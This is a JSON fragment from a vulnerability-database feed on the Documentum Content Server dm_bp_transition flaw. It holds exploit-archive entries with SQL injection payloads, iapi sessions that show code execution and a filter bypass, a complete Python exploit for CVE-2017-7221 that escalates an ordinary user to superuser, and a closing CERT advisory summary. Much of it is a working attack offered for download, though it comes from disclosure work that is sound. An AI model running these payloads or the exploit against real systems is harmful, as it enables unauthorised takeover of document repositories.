"2015-08-19T00:00:00", "id": "1337DAY-ID-24075", "href": "https://0day.today/exploit/description/24075", "sourceData": "Product: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51\r\n\r\nNew behavior introduced in CVE-2015-4532:\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n 0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n 0000000000000000 0000000000000000 0000000000000000 \"\"\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n \"The arguments being passed to the method 'dm_bp_transition' are \r\ninvalid:\r\n arguments contain sql keywords which are not allowed.\"\r\n\r\n\r\nNew attack vector (note ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n 0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n 0000000000000000 0000000000000000 0000000000000000 \"\"\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n__\r\nRegards,\r\nAndrey B. Panfilov\n\n# 0day.today [2018-04-12] #", "sourceHref": "https://0day.today/exploit/24075", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-08-16T08:17:45", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-25T00:00:00", "type": "exploitdb", "title": "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2017-7221", "CVE-2014-2513", "CVE-2015-4533", "CVE-2017-7221"], "modified": "2017-04-25T00:00:00", "id": "EDB-ID:41928", "href": "https://www.exploit-db.com/exploits/41928", "sourceData": "'''\r\nCVE Identifier: CVE-2017-7221\r\nVendor: OpenText\r\nAffected products: OpenText Documentum Content Server (all versions)\r\nResearcher: Andrey B. Panfilov\r\nSeverity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\r\nFix: not available\r\nPoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44\r\n\r\nDescription: \r\n\r\nall versions of Documentum Content Server contain dm_bp_transition docbase \r\nmethod (\"stored procedure\u201d) which is written on basic, implementation of this docbase \r\nmethods does not properly validate user input which allows attacker to execute arbitrary \r\ncode with superuser privileges.\r\n\r\nRelated code snippet is:\r\n\r\n==========================================8<========================================\r\n\r\n'Evaluate the user-defined entry criteria\r\nIf (result = True And run_entry = \"T\") Then\r\nIf (debug = True) Then\r\nPrintToLog sess, \"Run user defined entry criteria.\"\r\nEnd If\r\n'\r\n' researcher comment:\r\n' userEntryID parameter is controlled by attacker\r\n'\r\nresult = RunProcedure(userEntryID, 1, sess, sysID,_\r\nuser_name, targetState)\r\nEnd If\r\n\r\n...\r\n\r\n'\r\n' researcher comment:\r\n' procID parameter is controlled by attacker\r\n'\r\n\r\nFunction RunProcedure(procID As String, procNo As Integer,_\r\nsessID As String, objID As String, userName As String,_\r\ntargetState As String) As Boolean\r\n\r\n...\r\n\r\nStartIt:\r\nIf (procID <> \"0000000000000000\") Then\r\nresult = CheckStatus(\"\", 1, \"loading procedure \" & procID, True, errorMsg)\r\n'\r\n' researcher comment:\r\n' here basic interpreter loads content of user-provided script\r\n' from underlying repostiory using following technique:\r\n' \r\n' checking that it is dealing with dm_procedure object\r\n' (check was introduced in CVE-2014-2513):\r\n' id,c,dm_procedure where r_object_id='procID'\r\n' \r\n' getting content of basic script\r\n' fetch,c,procID\r\n' getpath,c,l\r\n'\r\n\r\nresult = external(procID)\r\nIf (result = True) Then\r\nIf (procNo = 1) Then\r\n' --- Running user-defined entry criteria ---\r\nresult = CheckStatus(\"\", 1, \"Running EntryCriteria\", True, errorMsg)\r\nOn Error Goto NoFunction\r\n'\r\n' researcher comment\r\n' here dmbasic interpreter executes user defined function\r\n'\r\nresult = EntryCriteria(sessID, objID, userName,_\r\ntargetState, errorStack)\r\nIf (result = False) Then\r\nerrorStack = \"[ErrorCode] 1500 [ServerError] \" + _\r\nerrorStack\r\nEnd If\r\n\r\n==========================================>8========================================\r\n\r\nSo, attacker is able to create it\u2019s own basic procedure in repository and pass it\u2019s identifier\r\nas argument for dm_bp_transition procedure:\r\n\r\n\r\n==========================================8<========================================\r\n$ cat /tmp/test\r\ncat: /tmp/test: No such file or directory\r\n$ cat > test.ebs\r\nPublic Function EntryCriteria(ByVal SessionId As String,_\r\nByVal ObjectId As String,_\r\nByVal UserName As String,_\r\nByVal TargetState As String,_\r\nByRef ErrorString As String) As Boolean\r\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\r\nEntryCriteria=True\r\nEnd Function\r\n$ iapi\r\nPlease enter a docbase name (docubase): repo\r\nPlease enter a user (dmadmin): unprivileged_user\r\nPlease enter password for unprivileged_user:\r\n\r\n\r\nEMC Documentum iapi - Interactive API interface\r\n(c) Copyright EMC Corp., 1992 - 2011\r\nAll rights reserved.\r\nClient Library Release 6.7.1000.0027\r\n\r\n\r\nConnecting to Server using docbase repo\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800b1a37\r\nstarted for user unprivileged_user.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_procedure\r\n...\r\n0801d920804e5416\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> ?,c,execute do_method with method='dm_bp_transition',\r\narguments='repo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 0801d920804e5416 0000000000000000 0000000000000000\r\n0000000000000000 \"\" 0 0 T F T T dmadmin 0000000000000000'\r\n(1 row affected)\r\n\r\nAPI> Bye\r\n$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n\r\n==========================================>8========================================\r\n\r\n\r\nVendor was been notified about this vulnerability on November 2013 using customer \r\nsupport channel, after a while vendor started claiming that this vulnerability \r\nwas remediated, though no CVE was announced. Moreover, the fix was contested\r\nand CERT/CC started tracking this vulnerability, the PoC provided\r\nto CERT/CC was:\r\n\r\n==========================================8<========================================\r\nVendor have decided that the root cause of problem is users are able to\r\ncreate dm_procedure objects, and now in Documentum Content Server\r\nv6.7SP1P26 we have following behavior:\r\n\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800f0174 started for\r\nuser unprivileged_user.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_procedure\r\n...\r\n0801d920805929d0\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: \"The current user\r\n(unprivileged_user) needs to have superuser or sysadmin privilege.\"\r\n\r\nBUT:\r\n\r\nAPI> create,c,dm_document\r\n...\r\n0901d920805929dd\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\nAPI> ?,c,execute do_method with\r\nmethod='dm_bp_transition',arguments='repo repo dmadmin \"\"\r\n0000000000000000 0000000000000000 0000000000000000 0901d920805929dd\r\n0000000000000000 0000000000000000 0000000000000000 \"\" 0 0 T F T T\r\ndmadmin 0000000000000000'\r\n(1 row affected)\r\n\r\n....\r\n\r\nAPI> Bye\r\n~]$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n~]$\r\n\r\n==========================================>8========================================\r\n\r\nOn July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.\r\n\r\nOn November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor \r\nconstantly fails to provide status of reported vulnerabilities) by providing another proof of concept, \r\ndescription provided to CERT/CC was:\r\n\r\n==========================================8<========================================\r\nI have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following\r\nerror:\r\n\r\n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected\r\nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the\r\ndocbase for the qualification: dm_procedure where r_object_id =\r\n'0801fd08805c9dfe'\"\r\n\r\nSuch behaviour means that EMC tried to remediate a security issue by\r\n\"checking\" object type of supplied object:\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'\r\n...\r\n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the\r\nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\"\r\n\r\nAPI> Bye\r\n\r\nbin]$ strings dmbasic| grep dm_procedure\r\nid,%s,dm_procedure where object_name = '%s' and folder('%s')\r\nid,%s,dm_procedure where r_object_id = '%s'\r\n# old version of dmbasic binary\r\nbin]$ strings dmbasic| grep dm_procedure\r\nbin]$\r\n\r\nSo, the fix was implemented in dmbasic binary, the problem is neither 6.7\r\nSP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch\r\nthat was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the\r\nissue is still reproducible because introduced check could be bypassed\r\nusing SQL injection:\r\n\r\n~]$ cat test.ebs\r\nPublic Function EntryCriteria(ByVal SessionId As String,_\r\nByVal ObjectId As String,_\r\nByVal UserName As String,_\r\nByVal TargetState As String,_\r\nByRef ErrorString As String) As Boolean\r\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\r\nEntryCriteria=True\r\nEnd Function\r\n~]$ cat /tmp/test\r\ncat: /tmp/test: No such file or directory\r\n\r\n~]$ iapi\r\nPlease enter a docbase name (docubase): repo\r\nPlease enter a user (dmadmin): test01\r\nPlease enter password for test01:\r\n\r\n\r\nEMC Documentum iapi - Interactive API interface\r\n(c) Copyright EMC Corp., 1992 - 2011\r\nAll rights reserved.\r\nClient Library Release 6.7.2190.0142\r\n\r\n\r\nConnecting to Server using docbase repo\r\n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for\r\nuser test01.\"\r\n\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> create,c,dm_sysobject\r\n...\r\n0801fd08805c9dfe\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 0000000000000000'\r\n\r\n...\r\n\r\n(1 row affected)\r\n\r\nAPI> Bye\r\n~]$ cat /tmp/test\r\ndm_bp_transition_has_vulnerability\r\n~]$\r\n\r\nHere \"union ...\" allows to bypass check based on \"id\" call:\r\n\r\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\r\nSession id is s0\r\nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union\r\nselect r_object_id from dm_sysobject where\r\nr_object_id='0801fd08805c9dfe'\r\n...\r\n0801fd08805c9dfe\r\nAPI> apply,c,,GET_LAST_SQL\r\n...\r\nq0\r\nAPI> next,c,q0\r\n...\r\nOK\r\nAPI> get,c,q0,result\r\n...\r\n\r\nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where\r\n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and\r\n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)\r\nunion select all dm_sysobject.r_object_id from dm_sysobject_sp\r\ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))\r\nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)\r\n\r\nAPI> close,c,q0\r\n...\r\nOK\r\n\r\nComma is required to bypass error in fetch call:\r\nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from\r\ndm_sysobject where r_object_id='0801fd08805c9dfe\r\n...\r\n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union\r\nselect r_object_id from dm_sysobject where r_object_id=\r\n'0801fd08805c9dfe\"\r\n\r\n\r\nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from\r\ndm_sysobject where r_object_id='0801fd08805c9dfe\r\n...\r\nOK\r\n==========================================>8========================================\r\n\r\nOn August 2015 vendor had undertaken another attempt to remediate this vulnerability\r\ncheck ESA-2015-131/CVE-2015-4533 for details.\r\n\r\nOn August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110\r\nfor detailed description - I just demonstrated another attack vector - using \r\nUNION ALL keyword instead of UNION:\r\n\r\n=================================8<================================\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n\"The arguments being passed to the method 'dm_bp_transition' are\r\ninvalid:\r\narguments contain sql keywords which are not allowed.\"\r\n\r\n\r\nNew attack vector (note ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\r\n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\r\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\r\n0000000000000000 0000000000000000 0000000000000000 \"\"\r\n0 0 T F T T dmadmin 0000000000000000'\r\n\r\n=================================>8================================\r\n\r\n\r\nRecently I have noticed that latest versions of Documentum Content\r\nServer are not affected by the PoC provided above, however all versions\r\nof Documentum Content Server are still vulnerable because vendor incorrectly\r\nimplemented input validation: they convert arguments to lower/upper-case, \r\nreplace line feed, carriage return and tab characters by a space, \r\nremove double spaces, after that they check where resulting string contains \r\nspecial keywords ('union ' and 'union all') or not - it is possible \r\nto use other whitespace characters like backspace, which is demonstrated\r\nin the PoC. \r\n\r\n\r\n__\r\n\r\nRegards,\r\nAndrey B. Panfilov\r\n\r\n\r\n\r\nCVE-2017-7221.py\r\n'''\r\n\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\nimport sys\r\nfrom os.path import basename\r\n\r\nfrom dctmpy.docbaseclient import DocbaseClient\r\nfrom dctmpy.obj.typedobject import TypedObject\r\n\r\nCIPHERS = \"ALL:aNULL:!eNULL\"\r\n\r\n\r\ndef usage():\r\n print \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0])\r\n\r\n\r\ndef main():\r\n if len(sys.argv) != 5:\r\n usage()\r\n exit(1)\r\n\r\n (session, docbase) = create_session(*sys.argv[1:5])\r\n\r\n if is_super_user(session):\r\n print \"Current user is a superuser, nothing to do\"\r\n exit(1)\r\n\r\n install_owner = session.serverconfig['r_install_owner']\r\n document_id = session.next_id(0x08)\r\n content_id = session.next_id(0x06)\r\n\r\n store = session.get_by_qualification(\"dm_store\")\r\n format = session.get_by_qualification(\"dm_format where name='crtext'\")\r\n handle = session.make_pusher(store['r_object_id'])\r\n if handle < 1:\r\n print \"Unable to create pusher\"\r\n exit(1)\r\n\r\n data = \"Public Function EntryCriteria(ByVal SessionId As String,_\" \\\r\n \"\\nByVal ObjectId As String,_\" \\\r\n \"\\nByVal UserName As String,_\" \\\r\n \"\\nByVal TargetState As String,_\" \\\r\n \"\\nByRef ErrorString As String) As Boolean\" \\\r\n \"\\nDim QueryID As String\" \\\r\n \"\\nDim Query As String\" \\\r\n \"\\nQuery = \\\"query,c,update dm_user objects set \" \\\r\n \"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\\r\n \"\\nQueryID = dmAPIGet(Query)\" \\\r\n \"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\\r\n \"\\nEntryCriteria=True\" \\\r\n \"\\nEnd Function\" % (sys.argv[3])\r\n\r\n b = bytearray()\r\n b.extend(data)\r\n\r\n if not session.start_push(handle, content_id, format['r_object_id'], len(b)):\r\n print \"Failed to start push\"\r\n exit(1)\r\n\r\n session.upload(handle, b)\r\n data_ticket = session.end_push_v2(handle)['DATA_TICKET']\r\n\r\n procedure = False\r\n try:\r\n print \"Trying to create dm_procedure\"\r\n document = TypedObject(session=session)\r\n document.set_string(\"OBJECT_TYPE\", \"dm_procedure\")\r\n document.set_bool(\"IS_NEW_OBJECT\", True)\r\n document.set_int(\"i_vstamp\", 0)\r\n document.set_int(\"world_permit\", 7)\r\n document.set_string(\"object_name\", \"CVE-2014-2513\")\r\n document.set_string(\"r_object_type\", \"dm_procedure\")\r\n document.append_id(\"i_contents_id\", content_id)\r\n document.set_int(\"r_page_cnt\", 1)\r\n document.set_string(\"a_content_type\", format['name'])\r\n document.set_bool(\"i_has_folder\", True)\r\n document.set_bool(\"i_latest_flag\", True)\r\n document.set_id(\"i_chronicle_id\", document_id)\r\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\r\n document.set_int(\"r_content_size\", len(b))\r\n if session.sys_obj_save(document_id, document):\r\n procedure = True\r\n except Exception, e:\r\n print str(e)\r\n\r\n if not procedure:\r\n print \"Failed to create dm_procedure\"\r\n print \"Trying to create dm_sysobject\"\r\n document = TypedObject(session=session)\r\n document.set_string(\"OBJECT_TYPE\", \"dm_sysobject\")\r\n document.set_bool(\"IS_NEW_OBJECT\", True)\r\n document.set_int(\"i_vstamp\", 0)\r\n document.set_string(\"owner_name\", sys.argv[3])\r\n document.set_int(\"world_permit\", 7)\r\n document.set_string(\"object_name\", \"CVE-2017-7221\")\r\n document.set_string(\"r_object_type\", \"dm_sysobject\")\r\n document.append_id(\"i_contents_id\", content_id)\r\n document.set_int(\"r_page_cnt\", 1)\r\n document.set_string(\"a_content_type\", format['name'])\r\n document.set_bool(\"i_has_folder\", True)\r\n document.set_bool(\"i_latest_flag\", True)\r\n document.set_id(\"i_chronicle_id\", document_id)\r\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\r\n document.set_int(\"r_content_size\", len(b))\r\n if not session.sys_obj_save(document_id, document):\r\n print \"Failed to create dm_sysobject\"\r\n exit(1)\r\n\r\n content = TypedObject(session=session)\r\n content.set_string(\"OBJECT_TYPE\", \"dmr_content\")\r\n content.set_bool(\"IS_NEW_OBJECT\", True)\r\n content.set_id(\"storage_id\", store['r_object_id'])\r\n content.set_id(\"format\", format['r_object_id'])\r\n content.set_int(\"data_ticket\", data_ticket)\r\n content.set_id(\"parent_id\", document_id)\r\n content.set_int(\"page\", 0)\r\n content.set_string(\"full_format\", format['name'])\r\n content.set_int(\"content_size\", len(b))\r\n if not session.save_cont_attrs(content_id, content):\r\n print \"Failed to create content\"\r\n exit(1)\r\n\r\n if procedure:\r\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\r\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\r\n \"0000000000000000 0000000000000000 \\\"%s\\\" \" \\\r\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\r\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\r\n (docbase, docbase, install_owner, document_id,\r\n install_owner, session.session)\r\n else:\r\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\r\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\r\n \"0000000000000000 0000000000000000 \\\"%s,'' \" \\\r\n \"union\\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\\r\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\r\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\r\n (docbase, docbase, install_owner, document_id,\r\n document_id, install_owner, session.session)\r\n\r\n session.query(query)\r\n\r\n r = session.query(\r\n \"select user_privileges from dm_user \"\r\n \"where user_name=USER\") \\\r\n .next_record()['user_privileges']\r\n if r != 16:\r\n print \"Failed\"\r\n exit(1)\r\n print \"P0wned!\"\r\n\r\n\r\ndef create_session(host, port, user, pwd, identity=None):\r\n print \"Trying to connect to %s:%s as %s ...\" % \\\r\n (host, port, user)\r\n session = None\r\n try:\r\n session = DocbaseClient(\r\n host=host, port=int(port),\r\n username=user, password=pwd,\r\n identity=identity)\r\n except socket.error, e:\r\n if e.errno == 54:\r\n session = DocbaseClient(\r\n host=host, port=int(port),\r\n username=user, password=pwd,\r\n identity=identity,\r\n secure=True, ciphers=CIPHERS)\r\n else:\r\n raise e\r\n docbase = session.docbaseconfig['object_name']\r\n version = session.serverconfig['r_server_version']\r\n print \"Connected to %s:%s, docbase: %s, version: %s\" % \\\r\n (host, port, docbase, version)\r\n return (session, docbase)\r\n\r\n\r\ndef is_super_user(session):\r\n user = session.get_by_qualification(\r\n \"dm_user WHERE user_name=USER\")\r\n if user['user_privileges'] == 16:\r\n return True\r\n group = session.get_by_qualification(\r\n \"dm_group where group_name='dm_superusers' \"\r\n \"AND any i_all_users_names=USER\")\r\n if group is not None:\r\n return True\r\n\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/41928", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:53:04", "description": "### Overview\n\nEMC Documentum products including Content Server, D2, and Web Development Kit (WDK) contain multiple vulnerabilities.\n\n### Description\n\nEMC Documentum Content Server, D2, and WDK contain numerous vulnerabilities of varying impact. For details, view our [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>). For status from the vendor, please visit <https://support.emc.com/docu38558> (requires EMC Online Support credentials). Search by CVE ID and/or ESA ID referenced in the spreadsheet.\n\nThe CVSS score below reflects use of backdoor credentials (see VU#184360, VU#695112, and VU#982432 in the [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>)). \n \n--- \n \n### Impact\n\nThe severity of impact varies. Specific examples include information disclosure, privilege escalation, authentication bypass, arbitrary code execution, shell command injection, and unauthorized access via backdoor credentials. Worst-case scenarios allow an attacker to take complete control of a vulnerable system. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nEMC has released updates to address many of the issues in question. For information about specific updates, including discussion about their effectiveness, refer to the [spreadsheet](<https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>). \n \n--- \n \n### Vendor Information\n\n315340\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### EMC Corporation __ Affected\n\nNotified: April 25, 2014 Updated: December 16, 2014 \n\n**Statement Date: December 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nEMC has been working with CERT on the issues announced in their recent advisory. We have released updates to address many of the issues in question and are investigating others. We will continue to create our remediation plans for open vulnerabilities and provide remedies via security advisories. We encourage our customers to refer to <http://support.emc.com> for the latest EMC Security Advisories: <https://support.emc.com/docu38558> and follow the steps identified in them to protect themselves. Please contact EMC Support for all other questions.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.emc.com/docu38558>\n * <http://support.emc.com>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:POC/RL:ND/RC:C \nEnvironmental | 6.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://docs.google.com/spreadsheets/d/1DiiUPCPvmaliWcfwPSc36y2mDvuidkDKQBWqaIuJi0A/edit?usp=sharing>\n * <http://www.emc.com/domains/documentum/index.htm>\n * <https://support.emc.com/docu38558>\n\n### Acknowledgements\n\nThanks to Andrey B. Panfilov for reporting these vulnerabilities.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-2520](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2520>), [CVE-2014-2518](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2518>), [CVE-2014-4622](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4622>), [CVE-2014-2514](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2514>), [CVE-2014-2507](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2507>), [CVE-2014-2513](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2513>), [CVE-2014-4618](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4618>), [CVE-2014-4626](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4626>), [CVE-2014-2515](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2515>), [CVE-2014-2504](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-2504>), [CVE-2014-4629](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-4629>) \n---|--- \n**Date Public:** | 2014-12-15 \n**Date First Published:** | 2014-12-15 \n**Date Last Updated: ** | 2017-01-06 15:45 UTC \n**Document Revision: ** | 50 \n", "cvss3": {}, "published": "2014-12-15T00:00:00", "type": "cert", "title": "EMC Documentum products contain multiple vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2504", "CVE-2014-2507", "CVE-2014-2513", "CVE-2014-2514", "CVE-2014-2515", "CVE-2014-2518", "CVE-2014-2520", "CVE-2014-4618", "CVE-2014-4622", "CVE-2014-4626", "CVE-2014-4629"], "modified": "2017-01-06T15:45:00", "id": "VU:315340", "href": "https://www.kb.cert.org/vuls/id/315340", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}